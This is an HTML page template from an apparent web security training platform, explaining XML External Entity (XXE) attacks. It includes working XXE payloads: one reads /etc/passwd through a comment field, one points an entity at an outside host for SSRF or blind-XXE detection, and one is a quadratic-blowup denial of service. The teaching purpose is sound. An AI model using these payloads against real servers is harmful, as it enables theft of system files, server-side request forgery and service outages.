<!DOCTYPE html>
<html xmlns:th="https://www.thymeleaf.org" lang="en">
<head>
    <meta charset="UTF-8">
    <title>Web Security Training Platform</title>
    <!-- CSS only -->
    <link rel="stylesheet" href="../../css/boostrap.min.css">
    <link rel="stylesheet" href="../../css/comments.css"/>
    <!-- JS, Popper.js, and jQuery -->
    <script src="../../javascript/jquery.slim.min.js"></script>
    <script src="../../javascript/popper.min.js"></script>
    <script src="../../javascript/boostrap.min.js"></script>
    <link rel="stylesheet" href="../../css/styles.css"/>
    <script src="../../javascript/script.js"></script>
</head>
<body>
<div id="wrapper" class="toggled">
    <div class="overlay"></div>

    <!-- Sidebar -->
    <nav class="navbar navbar-inverse fixed-top toggled" id="sidebar-wrapper" role="navigation">
        <ul class="nav sidebar-nav">
            <div class="sidebar-header">
                <div class="sidebar-brand">
                    <a href="/index">Home</a></div>
            </div>
            <li><a href="/introduction">Introduction</a></li>
            <li><a href="/injection">Injection</a></li>
            <li><a href="/auth">Broken Authorization</a></li>
            <li><a href="/xss">Cross-site Scripting (XSS)</a></li>
            <li><a href="/xxe">XML External Entity (XML)</a></li>
            <li><a href="/deserialization">Deserialization</a></li>
            <li><a href="/path">Path Traversal</a></li>
        </ul>
    </nav>
    <div id="page-content-wrapper">
        <div class="container">
            <div class="row">
                <div class="col-lg-8 col-lg-offset-2">
                    <h1>XML External Entity</h1>
                    <hr />
                    <h3>What is XML External Entity(XXE)?</h3>
                    <p>
                        XML External Entity is a vulnerability which occurs in applications, that parses
                        XML input. It is possible to pull out this attack, when xml parser is weakly configured,
                        which can happen by default in older libraries. The aim of this attacks is to retrieve files outside
                        root web folder, SSRF(Server-Side Request Forgery - user makes http requests from server), denial of service.
                    </p>
                    <h3>How to exploit XXE attacks?</h3>
                    <p>
                        To perform an XXE injection attack, you need to modify the submitted XML in two ways:
                    </p>
                    <div>
                        <ul>
                            <li>Introduce (or edit) a <u>DOCTYPE</u> element that defines an external entity containing the path to the file.</li>
                            <li>Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.</li>
                        </ul>
                    </div>
                    <p>
                        For example, suppose a blog that create comment
                        by submitting the following XML to the server:
                    </p>
                    <div class="border-secondary bg-light" style="font-family: 'Courier New'">
                        &lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
                        <br />
                        &lt;comment&gt;&lt;userId&gt;381&lt;/userId&gt;&lt;text&gt;text&lt;/text&gt;&lt;/comment&gt;
                    </div>
                    <p>
                        The application performs no particular defenses against XXE attacks, so you can exploit the XXE vulnerability to retrieve the /etc/passwd file by submitting the following XXE payload
                    </p>
                    <div class="border-secondary bg-light" style="font-family: 'Courier New'">
                        &lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
                        <br />
                        &lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM &quot;file:///etc/passwd&quot;&gt; ]&gt;
                        <br />
                        &lt;comment&gt;&lt;userId&gt;381&lt;/userId&gt;&lt;text&gt;&amp;xxe;&lt;/text&gt;&lt;/comment&gt;
                    </div>
                    <p>
                        As result, your submitted comment should display content of /etc/passwd file on server.
                    </p>
                    <br />
                    <p>
                        In order to perform SSRF attack, you have to change your DTD payload section, as below
                    </p>
                    <div class="border-secondary bg-light" style="font-family: 'Courier New'">
                        &lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM &quot;http://vulnerable.website.com&quot;&gt; ]&gt;
                    </div>
                    <p>
                        It's especially useful, if you are performing blind XXE attack, because if attack was successful,
                        you are able to find out if server was visiting your vulnerable website.
                    </p>
                    <br />
                    <p>
                        In order to perfrom DDoS(Denial of Service) attack, you have to defined multiple
                        nested entities("Billion laughs attack"), or define very long string, and defined it multiple times
                        ("Quadratic Blowup"). As example below, qudaratic blowup:
                    </p>
                    <div class="border-secondary bg-light" style="font-family: 'Courier New'">
                        &lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
                        <br />
                        &lt;!DOCTYPE foo [ &lt;!ENTITY xxe  &quot;xxxx...&quot;&gt; ]&gt;
                        <br />
                        &lt;comment&gt;&lt;userId&gt;381&lt;/userId&gt;&lt;text&gt;&amp;xxe;&amp;xxe;&amp;xxe;...&lt;/text&gt;&lt;/comment&gt;
                    </div>
                </div>
            </div>
        </div>
    </div>

</div>
</body>
</html>